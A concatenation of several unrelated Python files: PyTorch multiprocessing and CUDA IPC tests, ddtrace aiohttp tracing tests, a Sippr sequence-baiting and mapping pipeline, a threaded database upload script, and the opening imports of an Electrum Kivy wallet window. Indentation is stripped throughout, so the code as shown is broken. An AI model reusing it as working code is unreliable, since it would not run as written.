p2c = ctx.SimpleQueue()
c2p = ctx.SimpleQueue()
p = ctx.Process(
target=TestMultiprocessing._test_event_handle_importer_consumer,
args=(e0.ipc_handle(), p2c, c2p))
p.start()
c2p.get() # wait for child to become ready
torch.cuda._sleep(50000000) # spin for about 50 ms
e0.record()
p2c.put(0) # notify child event is recorded
self.assertFalse(e0.query())
c2p.get() # wait for synchronization in child
self.assertTrue(e0.query())
p2c.put(1) # notify child that parent is done
p.join()
@staticmethod
def _test_event_handle_exporter_consumer(handle, p2c, c2p):
stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
e1 = torch.cuda.Event.from_ipc_handle(
torch.cuda.current_device(), handle)
torch.cuda._sleep(50000000) # spin for about 50 ms
e1.record()
c2p.put(0)
        # wait until the parent process has finished synchronization before
        # destructing e1
p2c.get()
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
@unittest.skipIf(not TEST_CUDA_IPC, 'CUDA IPC not available')
def test_event_handle_exporter(self):
e0 = torch.cuda.Event(enable_timing=False, interprocess=True)
ctx = mp.get_context('spawn')
p2c = ctx.SimpleQueue()
c2p = ctx.SimpleQueue()
p = ctx.Process(
target=TestMultiprocessing._test_event_handle_exporter_consumer,
args=(e0.ipc_handle(), p2c, c2p))
p.start()
        # wait until the event is recorded in the child process
c2p.get()
self.assertFalse(e0.query())
e0.synchronize()
self.assertTrue(e0.query())
p2c.put(0)
p.join()
def _test_empty_tensor_sharing(self, dtype, device):
q = mp.Queue()
empty = torch.tensor([], dtype=dtype, device=device)
q.put(empty)
out = q.get(timeout=1)
self.assertEqual(out, empty)
def test_empty_tensor_sharing(self):
self._test_empty_tensor_sharing(torch.float32, torch.device('cpu'))
self._test_empty_tensor_sharing(torch.int64, torch.device('cpu'))
@unittest.skipIf(not torch.cuda.is_available(), 'CUDA not available')
def test_empty_tensor_sharing_cuda(self):
self._test_empty_tensor_sharing(torch.float32, torch.device('cuda'))
self._test_empty_tensor_sharing(torch.int64, torch.device('cuda'))
def _test_autograd_sharing(self, var, ctx=mp, is_parameter=False):
device = 'cuda' if var.is_cuda else 'cpu'
ready = ctx.Event()
master_modified = ctx.Event()
queue = ctx.Queue()
p = ctx.Process(target=autograd_sharing, args=(queue, ready, master_modified, device, is_parameter))
p.daemon = True
p.start()
# This would cause an error if we tried to serialize the hooks,
# because it's a closure and pickle doesn't support closures.
@torch.utils.hooks.unserializable_hook
def hook(*unused):
pass
if var.requires_grad:
var.register_hook(hook)
var._grad = torch.zeros(5, 5, device=device)
queue.put(var)
ready.wait()
var.data[0, 0] = 1000
var.grad.data[:] = torch.ones(5, 5, device=device) * 4
master_modified.set()
worker_ok = queue.get()
self.assertTrue(worker_ok)
self.assertEqual(var.data, torch.ones(5, 5, device=device))
self.assertEqual(var.grad.data, torch.ones(5, 5, device=device) * 4)
p.join(1)
self.assertFalse(p.is_alive())
# Check sharing a cudaMalloc allocation with different types of storage.
# (Issue #11422)
def _test_mixed_types_cuda_sharing(self, ctx=mp):
all_ones = torch.ones(2, 2).float()
all_zeros = torch.zeros(2, 2).byte()
queue = ctx.Queue()
event = ctx.Event()
p = ctx.Process(target=mixed_type_producer, args=(queue, event))
p.start()
for _ in range(10):
float_tensor = queue.get()
byte_tensor = queue.get()
self.assertEqual(float_tensor, all_ones)
self.assertEqual(byte_tensor, all_zeros)
del float_tensor, byte_tensor
event.set()
time.sleep(5)
p.join()
def test_variable_sharing(self):
for requires_grad in [True, False]:
var = torch.arange(1., 26).view(5, 5).requires_grad_(requires_grad)
self._test_autograd_sharing(var)
# See https://github.com/pytorch/pytorch/issues/14997
@unittest.skipIf(TEST_WITH_ASAN,
"non-deterministically hangs with ASAN")
def test_leaf_variable_sharing(self):
devices = ['cpu']
if torch.cuda.is_available() and not NO_MULTIPROCESSING_SPAWN and TEST_CUDA_IPC:
devices.append('cuda')
for device in devices:
for requires_grad in [True, False]:
var = torch.arange(1., 26, device=device).view(5, 5).requires_grad_(requires_grad)
self.assertTrue(var.is_leaf)
ctx = mp.get_context('spawn') if device == 'cuda' else mp
ready = ctx.Event()
queue = ctx.Queue()
p = ctx.Process(target=requires_grad_variable_sharing, args=(queue, ready))
p.daemon = True
p.start()
queue.put(var)
ready.wait()
worker_requires_grad = queue.get()
self.assertTrue(worker_requires_grad == requires_grad)
def test_non_leaf_variable_sharing(self):
devices = ['cpu'] if not torch.cuda.is_available() else ['cpu', 'cuda']
for device in devices:
var0 = torch.arange(1., 26, device=device).view(5, 5).requires_grad_(True)
var = var0 * 2
# Don't use a regular Queue; it uses a background thread (which
# means we can't catch the exceptions)
queue = mp.SimpleQueue()
self.assertRaisesRegex(RuntimeError, r'requires_grad', lambda: queue.put(var))
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
@unittest.skipIf(not TEST_CUDA_IPC, 'CUDA IPC not available')
def test_cuda_variable_sharing(self):
for requires_grad in [True, False]:
var = torch.arange(1., 26, device='cuda').view(5, 5).requires_grad_(requires_grad)
self._test_autograd_sharing(var, mp.get_context('spawn'))
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
@unittest.skipIf(not TEST_CUDA_IPC, 'CUDA IPC not available')
def test_mixed_types_cuda_sharing(self):
self._test_mixed_types_cuda_sharing(mp.get_context('spawn'))
def test_parameter_sharing(self):
param = Parameter(torch.arange(1., 26).view(5, 5))
self._test_autograd_sharing(param, is_parameter=True)
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
@unittest.skipIf(not TEST_CUDA_IPC, 'CUDA IPC not available')
def test_cuda_parameter_sharing(self):
param = Parameter(torch.arange(1., 26, device='cuda').view(5, 5))
self._test_autograd_sharing(param, mp.get_context('spawn'), is_parameter=True)
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
def test_integer_parameter_serialization_cpu(self):
self._test_integer_parameter_serialization(device='cpu')
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
@unittest.skipIf(not TEST_CUDA_IPC, 'CUDA IPC not available')
def test_integer_parameter_serialization_cuda(self):
self._test_integer_parameter_serialization(device='cuda')
def _test_integer_parameter_serialization(self, device):
param = torch.nn.Parameter(
torch.tensor(0, dtype=torch.int64, device=device),
requires_grad=False
)
ctx = mp.get_context('spawn')
p = ctx.Process(target=integer_parameter_serialization, args=(param,))
p.start()
p.join()
self.assertEqual(
0, p.exitcode,
msg=f'Failed to serialize successfully for "{device}" device!'
)
def test_empty_shared(self):
t = torch.tensor([])
t.share_memory_()
def _test_is_shared(self):
t = torch.randn(5, 5)
self.assertFalse(t.is_shared())
t.share_memory_()
self.assertTrue(t.is_shared())
@unittest.skipIf(platform == 'darwin', "file descriptor strategy is not supported on macOS")
def test_is_shared(self):
self._test_is_shared()
def test_fs_is_shared(self):
with fs_sharing():
self._test_is_shared()
@unittest.skipIf(not torch.cuda.is_available(), 'CUDA not available')
def test_is_shared_cuda(self):
t = torch.randn(5, 5).cuda()
self.assertTrue(t.is_shared())
if __name__ == '__main__':
run_tests()
|
test_request.py
|
import threading
import asyncio
import aiohttp_jinja2
from urllib import request
from aiohttp.test_utils import unittest_run_loop
from ddtrace.pin import Pin
from ddtrace.contrib.aiohttp.patch import patch, unpatch
from ddtrace.contrib.aiohttp.middlewares import trace_app
from .utils import TraceTestCase
from ... import assert_is_measured
class TestRequestTracing(TraceTestCase):
"""
Ensures that the trace includes all traced components.
"""
def enable_tracing(self):
        # enable tracing:
# * middleware
# * templates
trace_app(self.app, self.tracer)
patch()
Pin.override(aiohttp_jinja2, tracer=self.tracer)
def disable_tracing(self):
unpatch()
@unittest_run_loop
@asyncio.coroutine
def test_full_request(self):
# it should create a root span when there is a handler hit
# with the proper tags
request = yield from self.client.request("GET", "/template/")
assert 200 == request.status
yield from request.text()
# the trace is created
traces = self.tracer.writer.pop_traces()
assert 1 == len(traces)
assert 2 == len(traces[0])
request_span = traces[0][0]
assert_is_measured(request_span)
template_span = traces[0][1]
# request
assert "aiohttp-web" == request_span.service
assert "aiohttp.request" == request_span.name
assert "GET /template/" == request_span.resource
# template
assert "aiohttp-web" == template_span.service
assert "aiohttp.template" == template_span.name
assert "aiohttp.template" == template_span.resource
@unittest_run_loop
@asyncio.coroutine
def test_multiple_full_request(self):
# it should handle multiple requests using the same loop
def make_requests():
url = self.client.make_url("/delayed/")
response = request.urlopen(str(url)).read().decode("utf-8")
assert "Done" == response
# blocking call executed in different threads
threads = [threading.Thread(target=make_requests) for _ in range(10)]
for t in threads:
t.daemon = True
t.start()
# we should yield so that this loop can handle
# threads' requests
yield from asyncio.sleep(0.5)
for t in threads:
t.join(timeout=0.5)
# the trace is created
traces = self.tracer.writer.pop_traces()
assert 10 == len(traces)
assert 1 == len(traces[0])
@unittest_run_loop
@asyncio.coroutine
@TraceTestCase.run_in_subprocess(env_overrides=dict(DD_SERVICE="mysvc"))
def test_user_specified_service(self):
"""
When a service name is specified by the user
The aiohttp integration should use it as the service name
"""
request = yield from self.client.request("GET", "/template/")
yield from request.text()
traces = self.tracer.writer.pop_traces()
assert 1 == len(traces)
assert 2 == len(traces[0])
request_span = traces[0][0]
assert request_span.service == "mysvc"
template_span = traces[0][1]
assert template_span.service == "mysvc"
|
sippingmethods.py
|
#!/usr/bin/env python
from glob import glob
from subprocess import call
from threading import Thread
from Bio.Sequencing.Applications import *
from accessoryfunctions.accessoryFunctions import *
from accessoryfunctions.metadataprinter import *
from .bowtie import *
from io import StringIO
__author__ = 'adamkoziol'
class Sippr(object):
def targets(self):
printtime('Performing analysis with {} targets folder'.format(self.analysistype), self.start)
if self.pipeline:
for sample in self.runmetadata:
if sample.general.bestassemblyfile != 'NA':
setattr(sample, self.analysistype, GenObject())
# Set attributes
try:
sample[self.analysistype].targetpath = \
os.path.join(self.targetpath, self.analysistype, sample.mash.closestrefseqgenus, '')
except KeyError:
sample[self.analysistype].targetpath = \
os.path.join(self.targetpath, self.analysistype, sample.general.closestrefseqgenus, '')
# Ignore any species that do not match the desired species e.g. Listeria monocytogenes is acceptable
# while Listeria grayi is not. Right now, this sets the best assembly file to 'NA' to get the script
# to ignore this isolate, but something more fleshed out may be required in the future
for genus, species in self.taxonomy.items():
try:
if genus == sample.mash.closestrefseqgenus and species != sample.mash.closestrefseqspecies:
sample.general.bestassemblyfile = 'NA'
except KeyError:
pass
# There is a relatively strict databasing scheme necessary for the custom targets. Eventually,
# there will be a helper script to combine individual files into a properly formatted combined file
try:
sample[self.analysistype].baitfile = glob('{}*.fasta'
.format(sample[self.analysistype].targetpath))[0]
# If the fasta file is missing, raise a custom error
except IndexError as e:
# noinspection PyPropertyAccess
e.args = ['Cannot find the combined fasta file in {}. Please note that the file must have a '
'.fasta extension'.format(sample[self.analysistype].targetpath)]
if os.path.isdir(sample[self.analysistype].targetpath):
raise
else:
sample.general.bestassemblyfile = 'NA'
for sample in self.runmetadata:
if sample.general.bestassemblyfile != 'NA':
# Create the hash file of the baitfile
targetbase = sample[self.analysistype].baitfile.split('.')[0]
sample[self.analysistype].hashfile = targetbase + '.mhs.gz'
sample[self.analysistype].hashcall = 'cd {} && mirabait -b {} -k 19 -K {}'\
.format(sample[self.analysistype].targetpath,
sample[self.analysistype].baitfile,
sample[self.analysistype].hashfile)
if not os.path.isfile(sample[self.analysistype].hashfile):
call(sample[self.analysistype].hashcall, shell=True, stdout=self.devnull, stderr=self.devnull)
# Ensure that the hash file was successfully created
assert os.path.isfile(sample[self.analysistype].hashfile), \
u'Hashfile could not be created for the target file {0!r:s}'.format(
sample[self.analysistype].baitfile)
sample[self.analysistype].outputdir = os.path.join(sample.run.outputdirectory, self.analysistype)
sample[self.analysistype].baitedfastq = \
'{}/{}_targetMatches.fastq'.format(sample[self.analysistype].outputdir, self.analysistype)
else:
# There is a relatively strict databasing scheme necessary for the custom targets. Eventually, there will
# be a helper script to combine individual files into a properly formatted combined file
try:
self.baitfile = glob('{}*.fasta'.format(self.targetpath))[0]
# If the fasta file is missing, raise a custom error
except IndexError:
# Combine any .tfa files in the directory into a combined targets .fasta file
from Bio import SeqIO
tfafiles = glob(os.path.join(self.targetpath, '*.tfa'))
if tfafiles:
with open(os.path.join(self.targetpath, 'combinedtargets.fasta'), 'w') as combined:
for tfafile in tfafiles:
for record in SeqIO.parse(tfafile, 'fasta'):
SeqIO.write(record, combined, 'fasta')
try:
self.baitfile = glob('{}*.fasta'.format(self.targetpath))[0]
except IndexError as e:
# noinspection PyPropertyAccess
e.args = ['Cannot find the combined fasta file in {}. Please note that the file must have a '
'.fasta extension'.format(self.targetpath)]
raise
# Create the hash file of the baitfile
targetbase = self.baitfile.split('.')[0]
self.hashfile = targetbase + '.mhs.gz'
self.hashcall = 'cd {} && mirabait -b {} -k 19 -K {}'.format(self.targetpath, self.baitfile, self.hashfile)
if not os.path.isfile(self.hashfile):
call(self.hashcall, shell=True, stdout=self.devnull, stderr=self.devnull)
# Ensure that the hash file was successfully created
assert os.path.isfile(self.hashfile), u'Hashfile could not be created for the target file {0!r:s}' \
.format(self.baitfile)
for sample in self.runmetadata:
setattr(sample, self.analysistype, GenObject())
# Set attributes
sample[self.analysistype].baitfile = self.baitfile
sample[self.analysistype].hashfile = self.hashfile
sample[self.analysistype].hashcall = self.hashcall
sample[self.analysistype].targetpath = self.targetpath
sample[self.analysistype].outputdir = os.path.join(sample.run.outputdirectory, self.analysistype)
sample[self.analysistype].baitedfastq = '{}/{}_targetMatches.fastq'.format(sample[self.analysistype]
.outputdir,
self.analysistype)
# Bait
self.baiting()
def baiting(self):
# Perform baiting
printtime('Performing kmer baiting of fastq files with {} targets'.format(self.analysistype), self.start)
# Create and start a worker thread for each sample in the run metadata
for i in range(len(self.runmetadata)):
# Send the threads to the bait method
threads = Thread(target=self.bait, args=())
# Daemonise the thread so it does not block interpreter exit
threads.setDaemon(True)
# Start the threading
threads.start()
for sample in self.runmetadata:
if sample.general.bestassemblyfile != 'NA':
# Add the sample to the queue
self.baitqueue.put(sample)
self.baitqueue.join()
# Run the bowtie2 read mapping module
self.mapping()
def bait(self):
"""
Runs mirabait on the fastq files
"""
while True:
sample = self.baitqueue.get()
# Create the folder (if necessary)
make_path(sample[self.analysistype].outputdir)
# Make the system call
if len(sample.general.fastqfiles) == 2:
sample[self.analysistype].mirabaitcall = 'mirabait -c -B {} -t 4 -o {} -p {} {}' \
.format(sample[self.analysistype].hashfile, sample[self.analysistype].baitedfastq,
sample.general.fastqfiles[0], sample.general.fastqfiles[1])
else:
sample[self.analysistype].mirabaitcall = 'mirabait -c -B {} -t 4 -o {} {}' \
.format(sample[self.analysistype].hashfile, sample[self.analysistype].baitedfastq,
sample.general.fastqfiles[0])
# Run the system call (if necessary)
if not os.path.isfile(sample[self.analysistype].baitedfastq):
call(sample[self.analysistype].mirabaitcall, shell=True, stdout=self.devnull, stderr=self.devnull)
self.baitqueue.task_done()
def mapping(self):
printtime('Performing reference mapping', self.start)
for i in range(len(self.runmetadata)):
# Send the threads to the map method
threads = Thread(target=self.map, args=())
# Daemonise the thread so it does not block interpreter exit
threads.setDaemon(True)
# Start the threading
threads.start()
for sample in self.runmetadata:
if sample.general.bestassemblyfile != 'NA':
# Set the path/name for the sorted bam file to be created
sample[self.analysistype].sortedbam = '{}/{}_sorted.bam'.format(sample[self.analysistype].outputdir,
self.analysistype)
# Remove the file extension of the bait file for use in the indexing command
sample[self.analysistype].baitfilenoext = sample[self.analysistype].baitfile.split('.')[0]
# Use the bowtie2 wrapper to create an index of the target file
bowtie2build = Bowtie2BuildCommandLine(reference=sample[self.analysistype].baitfile,
bt2=sample[self.analysistype].baitfilenoext,
**self.builddict)
# Use samtools wrapper to set up the bam sorting command
samsort = SamtoolsSortCommandline(input=sample[self.analysistype].sortedbam,
o=True,
out_prefix="-")
samtools = [
# When bowtie2 maps reads to all possible locations rather than choosing a 'best' placement, the
# SAM flag for that read is set to 'secondary alignment', or 256. Please see:
# http://davetang.org/muse/2014/03/06/understanding-bam-flags/ The script below reads stdin
# and subtracts 256 from flags which include 256
'python {}/sipprcommon/editsamheaders.py'.format(self.homepath),
# Use samtools wrapper to set up the samtools view
SamtoolsViewCommandline(b=True,
S=True,
h=True,
input_file="-"),
samsort]
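# A minimal sketch of the flag fix described above (an assumption; the real
# editsamheaders.py is not reproduced here): for each SAM record read from stdin,
#     fields = line.split('\t')
#     flag = int(fields[1])
#     if flag & 256:
#         fields[1] = str(flag - 256)
#     sys.stdout.write('\t'.join(fields))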
# print([samtools])
# Add custom parameters to a dictionary to be used in the bowtie2 alignment wrapper
indict = {'--very-sensitive-local': True,
# For short targets, the match bonus can be increased
'--ma': self.matchbonus,
'-U': sample[self.analysistype].baitedfastq,
'-a': True,
'--threads': self.threads,
'--local': True}
# Create the bowtie2 reference mapping command
bowtie2align = Bowtie2CommandLine(bt2=sample[self.analysistype].baitfilenoext,
threads=self.threads,
samtools=samtools,
**indict)
# Create the command to faidx index the bait file
sample[self.analysistype].faifile = sample[self.analysistype].baitfile + '.fai'
samindex = SamtoolsFaidxCommandline(reference=sample[self.analysistype].baitfile)
# Add the commands (as strings) to the metadata
sample[self.analysistype].samindex = str(samindex)
# Add the commands to the queue. Note that the commands would usually be set as attributes of the sample
# but there was an issue with their serialization when printing out the metadata
if not os.path.isfile(sample[self.analysistype].baitfilenoext + '.1' + self.bowtiebuildextension):
stdoutbowtieindex, stderrbowtieindex = map(StringIO,
bowtie2build(cwd=sample[self.analysistype].targetpath))
# Write any error to a log file
if stderrbowtieindex:
# Write the standard error to the log file; bowtie2-build reports its progress here
with open(os.path.join(sample[self.analysistype].targetpath,
'{}_bowtie_index.log'.format(self.analysistype)), 'a+') as log:
log.writelines(logstr(bowtie2build, stderrbowtieindex.getvalue(),
stdoutbowtieindex.getvalue()))
# Close the stdout and stderr streams
stdoutbowtieindex.close()
stderrbowtieindex.close()
self.mapqueue.put((sample, bowtie2build, bowtie2align, samindex))
self.mapqueue.join()
# Use samtools to index the sorted bam file
self.indexing()
def map(self):
while True:
# Get the necessary values from the queue
sample, bowtie2build, bowtie2align, samindex = self.mapqueue.get()
# Use samtools faidx to index the bait file - this will be used in the sample parsing
if not os.path.isfile(sample[self.analysistype].faifile):
stdoutindex, stderrindex = map(StringIO, samindex(cwd=sample[self.analysistype].targetpath))
# Write any error to a log file
if stderrindex:
# Write the standard error to the log file
with open(os.path.join(sample[self.analysistype].targetpath,
'{}_samtools_index.log'.format(self.analysistype)), 'a+') as log:
log.writelines(logstr(samindex, stderrindex.getvalue(), stdoutindex.getvalue()))
# Close the stdout and stderr streams
stdoutindex.close()
stderrindex.close()
# Only run the functions if the sorted bam files and the indexed bait file do not exist
if not os.path.isfile(sample[self.analysistype].sortedbam):
# Set stdout to a stringIO stream
stdout, stderr = map(StringIO, bowtie2align(cwd=sample[self.analysistype].outputdir))
if stderr:
# Write the standard error to log, bowtie2 puts alignment summary here
with open(os.path.join(sample[self.analysistype].outputdir,
'{}_bowtie_samtools.log'.format(self.analysistype)), 'a+') as log:
log.writelines(logstr([bowtie2align], stderr.getvalue(), stdout.getvalue()))
stdout.close()
stderr.close()
self.mapqueue.task_done()
def indexing(self):
printtime('Indexing sorted bam files', self.start)
for i in range(len(self.runmetadata)):
# Send the threads to the index method
threads = Thread(target=self.index, args=())
# Daemonise the thread so it does not block interpreter exit
threads.setDaemon(True)
# Start the threading
threads.start()
for sample in self.runmetadata:
if sample.general.bestassemblyfile != 'NA':
bamindex = SamtoolsIndexCommandline(input=sample[self.analysistype].sortedbam)
sample[self.analysistype].sortedbai = sample[self.analysistype].sortedbam + '.bai'
sample[self.analysistype].bamindex = str(bamindex)
self.indexqueue.put((sample, bamindex))
self.indexqueue.join()
# Parse the results
self.parsing()
def index(self):
while True:
sample, bamindex = self.indexqueue.get()
# Only make the call if the .bai file doesn't already exist
if not os.path.isfile(sample[self.analysistype].sortedbai):
# Use StringIO streams to capture the samtools index output
stdout, stderr = map(StringIO, bamindex(cwd=sample[self.analysistype].outputdir))
if stderr:
# Write the standard error to log
with open(os.path.join(sample[self.analysistype].outputdir,
'{}_samtools_bam_index.log'.format(self.analysistype)), 'a+') as log:
log.writelines(logstr(bamindex, stderr.getvalue(), stdout.getvalue()))
stderr.close()
self.indexqueue.task_done()
def parsing(self):
printtime('Parsing sorted bam files', self.start)
for i in range(len(self.runmetadata)):
# Send the threads to the parse method
threads = Thread(target=self.parse, args=())
# Daemonise the thread so it does not block interpreter exit
threads.setDaemon(True)
# Start the threading
threads.start()
for sample in self.runmetadata:
if sample.general.bestassemblyfile != 'NA':
# Get the fai file into a dictionary to be used in parsing results
with open(sample[self.analysistype].faifile, 'r') as faifile:
for line in faifile:
data = line.split('\t')
try:
sample[self.analysistype].faidict[data[0]] = int(data[1])
except KeyError:
sample[self.analysistype].faidict = dict()
sample[self.analysistype].faidict[data[0]] = int(data[1])
self.parsequeue.put(sample)
self.parsequeue.join()
def parse(self):
import pysamstats
import operator
import numpy
while True:
sample = self.parsequeue.get()
# Initialise dictionaries to store parsed data
matchdict = dict()
depthdict = dict()
seqdict = dict()
snpdict = dict()
gapdict = dict()
maxdict = dict()
mindict = dict()
deviationdict = dict()
sample[self.analysistype].results = dict()
sample[self.analysistype].avgdepth = dict()
sample[self.analysistype].resultssnp = dict()
sample[self.analysistype].resultsgap = dict()
sample[self.analysistype].sequences = dict()
sample[self.analysistype].maxcoverage = dict()
sample[self.analysistype].mincoverage = dict()
sample[self.analysistype].standarddev = dict()
# Variable to store the expected position in gene/allele
pos = 0
try:
# Use the stat_variation function of pysam stats to return records parsed from sorted bam files
# Values of interest can be retrieved using the appropriate keys
for rec in pysamstats.stat_variation(alignmentfile=sample[self.analysistype].sortedbam,
fafile=sample[self.analysistype].baitfile,
max_depth=1000000):
# Initialise seqdict with the current gene/allele if necessary with an empty string
if rec['chrom'] not in seqdict:
seqdict[rec['chrom']] = str()
# Since this is the first position in a "new" gene/allele, reset the pos variable to 0
pos = 0
# Initialise gap dict with 0 gaps
if rec['chrom'] not in gapdict:
gapdict[rec['chrom']] = 0
# If there is a gap in the alignment, record the size of the gap in gapdict
if int(rec['pos']) > pos:
# Add the gap size to gap dict
gapdict[rec['chrom']] += rec['pos'] - pos
# Set the expected position to the current position
pos = int(rec['pos'])
# Increment pos in preparation for the next iteration
pos += 1
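# e.g. if positions 0-10 were covered (so pos is now 11) and the next record sits at
# position 15, gapdict[rec['chrom']] increases by 15 - 11 = 4 uncovered bases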
# Initialise snpdict if necessary
if rec['chrom'] not in snpdict:
snpdict[rec['chrom']] = 0
# Initialise the current gene/allele in depthdict with the depth (reads_all) if necessary,
# otherwise add the current depth to the running total
if rec['chrom'] not in depthdict:
depthdict[rec['chrom']] = int(rec['reads_all'])
else:
depthdict[rec['chrom']] += int(rec['reads_all'])
# Dictionary of bases and the number of times each base was observed per position
bases = {'A': rec['A'], 'C': rec['C'], 'G': rec['G'], 'T': rec['T']}
# If the most prevalent base (calculated with max() and operator.itemgetter()) does not match the
# reference base, add this prevalent base to seqdict
if max(bases.items(), key=operator.itemgetter(1))[0] != rec['ref']:
seqdict[rec['chrom']] += max(bases.items(), key=operator.itemgetter(1))[0]
# Increment the running total of the number of SNPs
snpdict[rec['chrom']] += 1
else:
# If the bases match, add the reference base to seqdict
seqdict[rec['chrom']] += (rec['ref'])
# Initialise matchdict if necessary; otherwise, increment the running total of matches
if rec['chrom'] not in matchdict:
matchdict[rec['chrom']] = 1
else:
matchdict[rec['chrom']] += 1
# Find the max and min coverage for each strain/gene combo
try:
maxdict[rec['chrom']] = int(rec['reads_all']) if \
int(rec['reads_all']) >= maxdict[rec['chrom']] else maxdict[rec['chrom']]
except KeyError:
maxdict[rec['chrom']] = int(rec['reads_all'])
try:
mindict[rec['chrom']] = int(rec['reads_all']) if \
int(rec['reads_all']) <= mindict[rec['chrom']] else mindict[rec['chrom']]
except KeyError:
mindict[rec['chrom']] = int(rec['reads_all'])
# Create a list of all the depths in order to calculate the standard deviation
try:
deviationdict[rec['chrom']].append(int(rec['reads_all']))
except KeyError:
deviationdict[rec['chrom']] = list()
deviationdict[rec['chrom']].append(int(rec['reads_all']))
# If there are no results in the bam file, then pass over the strain
except ValueError:
pass
# Iterate through all the genes/alleles with results above
for allele in sorted(matchdict):
# If the length of the match is greater or equal to the length of the gene/allele (multiplied by the
# cutoff value) as determined using faidx indexing, then proceed
if matchdict[allele] >= sample[self.analysistype].faidict[allele] * self.cutoff:
# Calculate the average depth by dividing the total number of reads observed by the
# length of the gene
averagedepth = float(depthdict[allele]) / float(matchdict[allele])
percentidentity = float(matchdict[allele]) / float(sample[self.analysistype].faidict[allele]) * 100
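# Worked example: with the default cutoff of 0.98, a 1000 bp allele needs >= 980
# matched positions; if depthdict totalled 50000 reads over 980 matches, then
# averagedepth = 50000 / 980 ~ 51X and percentidentity = 980 / 1000 * 100 = 98.00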
# Only report a positive result if this average depth is greater than 10X
if averagedepth > 10:
# Populate resultsdict with the gene/allele name, the percent identity, and the average depth
sample[self.analysistype].results.update({allele: '{:.2f}'.format(percentidentity)})
sample[self.analysistype].avgdepth.update({allele: '{:.2f}'.format(averagedepth)})
# Add the SNP and gap results to dictionaries
sample[self.analysistype].resultssnp.update({allele: snpdict[allele]})
sample[self.analysistype].resultsgap.update({allele: gapdict[allele]})
sample[self.analysistype].sequences.update({allele: seqdict[allele]})
sample[self.analysistype].maxcoverage.update({allele: maxdict[allele]})
sample[self.analysistype].mincoverage.update({allele: mindict[allele]})
sample[self.analysistype]\
.standarddev.update({allele: '{:.2f}'.format(numpy.std(deviationdict[allele], ddof=1))})
self.parsequeue.task_done()
# noinspection PyDefaultArgument
def __init__(self, inputobject, cutoff=0.98, matchbonus=2, builddict=dict(), extension='.bt2'):
from queue import Queue
self.path = inputobject.path
self.sequencepath = inputobject.sequencepath
self.targetpath = inputobject.targetpath
self.reportpath = inputobject.reportpath
self.runmetadata = inputobject.runmetadata.samples
self.start = inputobject.starttime
self.analysistype = inputobject.analysistype
self.cpus = inputobject.cpus
self.threads = inputobject.threads
self.pipeline = inputobject.pipeline
self.homepath = inputobject.homepath
self.taxonomy = inputobject.taxonomy
self.cutoff = cutoff
self.matchbonus = matchbonus
self.builddict = builddict
self.bowtiebuildextension = extension
self.baitfile = str()
self.hashfile = str()
self.hashcall = str()
self.devnull = open(os.devnull, 'wb') # define /dev/null
self.baitqueue = Queue(maxsize=self.cpus)
self.mapqueue = Queue(maxsize=self.cpus)
self.indexqueue = Queue(maxsize=self.cpus)
self.parsequeue = Queue(maxsize=self.cpus)
# Run the analyses
self.targets()
# Print the metadata
printer = MetadataPrinter(self)
printer.printmetadata()
|
th_main.py
|
""" Это реализация парсинга, в которой загрузка в базу данных делается отдельным тредом.
Выигрыш во времени на удаленной БД - примерно 40%
Пробовал и параллелить сам парсинг с помощью тред пула - выигрыша во времени нет
"""
import logging
import threading
from main import upload_batch, get_filenames, startdir, XlsIterator, upload_df, show_1265_warnings
from db import open_db, close_db
from queue import Queue
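# Consumer thread: repeatedly pulls (SQL, batch) tuples off the queue and uploads each
# batch, printing a progress line whenever the source filename changes. An empty batch
# (the sentinel pushed by the main block) ends the loop and the DB connection is closed.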
def upload_worker(queue: Queue):
cur, conn = open_db()
print('Worker started, waiting for data...')
SQL, batch = queue.get()
fname = batch[0]['bkf_filename'] if batch else None
print(f'WORKER: Uploading {fname} to DB....')
while batch:
old_fname = fname
fname = batch[0]['bkf_filename']
if fname != old_fname:
print(f'WORKER: Uploading {fname} to DB....')
warnings_ = upload_batch(SQL, batch, cur, conn)
SQL, batch = queue.get()
show_1265_warnings(warnings_)
close_db(cur, conn)
if __name__ == "__main__":
import time
t1 = time.time()
print('Getting filenames...')
filenames = get_filenames(startdir)
print('Initializing parser')
walkall = XlsIterator(filenames, 0)
# Create a queue for the DB upload batches; a separate thread will consume it
batch_queue = Queue()
upload_thread = threading.Thread(target=upload_worker, args=(batch_queue,))
upload_thread.daemon = True
print('Start upload to db thread...')
upload_thread.start()
for df in walkall:
upload_df(df, batch_queue)
print('Putting the empty sentinel batch on the queue')
batch_queue.put(('', []))
upload_thread.join()
t2 = time.time()
print('Elapsed time:', t2-t1)
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import electrum
from electrum.bitcoin import TYPE_ADDRESS
from electrum import WalletStorage, Wallet
from electrum_gui.kivy.i18n import _
from electrum.paymentrequest import InvoiceStore
from electrum.util import profiler, InvalidPassword
from electrum.plugins import run_hook
from electrum.util import format_satoshis, format_satoshis_plain
from electrum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
#from kivy.core.window import Window
